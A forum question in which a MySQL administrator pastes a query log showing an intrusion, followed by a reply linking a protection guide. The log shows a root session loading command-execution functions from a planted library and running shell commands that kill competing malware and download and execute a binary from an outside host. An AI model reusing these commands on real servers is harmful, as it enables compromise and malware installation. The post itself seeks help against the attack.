Whenever I change max_allowed_packet, its getting reset after few hours. when I checked query log then I found following queries. But I am unable to figure out which application or process executes this queries. Does anyone know what is it about? or it is mysql itself?
161020 3:09:34 723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
723 Query CREATE FUNCTION sys_set RETURNS int SONAME 'ptfuki32.so'
161020 3:09:35 723 Query CREATE FUNCTION sys_exec RETURNS int SONAME 'ptfuki32.so'
723 Query CREATE FUNCTION sys_eval RETURNS string SONAME 'ptfuki32.so'
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
161020 3:09:36 723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
161020 3:09:37 723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Quit
724 Connect root@ip on mysql
161020 3:09:38 724 Query SHOW VARIABLES LIKE '%compile_os%'
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
161020 3:09:39 724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('killall -9 .sshd')
724 Query select sys_eval('killall -9 .sh')
161020 3:09:40 724 Query select sys_eval('killall -9 and1')
724 Query select sys_eval('killall -9 cisco')
724 Query select sys_eval('killall -9 ciscoh')
724 Query select sys_eval('killall -9 L24')
724 Query select sys_eval('killall -9 L26')
161020 3:09:41 724 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
724 Query select sys_eval('chmod 777 http://ip:5555;')
724 Query select sys_eval('./http://ip:5555;')
724 Query select sys_eval('kill str=`netstat -anept 2>/dev/null |grep -E ':(68866|7583|2222|10711|6009|10991|10771|7168|7668|36000|36001|25000|25001|25002)'|cut -d / -f 1`')
724 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
161020 3:09:42 724 Query select sys_eval('wget http://ip4:5555/v9mm;chmod 777 v9mm;./v9mm;')
724 Quit
725 Connect root@ip on mysql
725 Query SHOW VARIABLES LIKE '%compile_os%'
161020 3:09:43 725 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
725 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
725 Query FLUSH PRIVILEGES
725 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
725 Query FLUSH PRIVILEGES
161020 3:09:44 725 Query DROP FUNCTION IF EXISTS lib_mysqludf_sys_info
725 Query DROP FUNCTION IF EXISTS sys_get
725 Query DROP FUNCTION IF EXISTS sys_set
161020 3:09:45 725 Query DROP FUNCTION IF EXISTS sys_exec
725 Query DROP FUNCTION IF EXISTS sys_eval
725 Query DROP FUNCTION IF EXISTS cmdshell
725 Query set global log_bin_trust_function_creators=0
725 Query SET GLOBAL log_bin_trust_function_creators=FALSE
161020 3:09:46 725 Query SET GLOBAL log_bin_trust_routine_creators=0
725 Query SET GLOBAL max_allowed_packet=1024
725 Query FLUSH PRIVILEGES
725 Query DROP FUNCTION IF EXISTS lib_mysqludf_sys_info
725 Query DROP FUNCTION IF EXISTS sys_get
161020 3:09:47 725 Query DROP FUNCTION IF EXISTS sys_set
725 Query DROP FUNCTION IF EXISTS sys_exec
725 Query DROP FUNCTION IF EXISTS sys_eval
725 Query DROP FUNCTION IF EXISTS cmdshell
725 Query set global log_bin_trust_function_creators=0
161020 3:09:48 725 Query SET GLOBAL log_bin_trust_function_creators=FALSE
725 Query SET GLOBAL log_bin_trust_routine_creators=0
725 Query SET GLOBAL max_allowed_packet=1024
725 Query FLUSH PRIVILEGES
725 Quit
This seems someone has attacked my mysql server with sql injection. cna12.dll is malware file. check link below to prevent from such attacks https://malwaremusings.com/2013/02/14/how-to-protect-yourself-from-the-cna12-dll-mysql-attacks/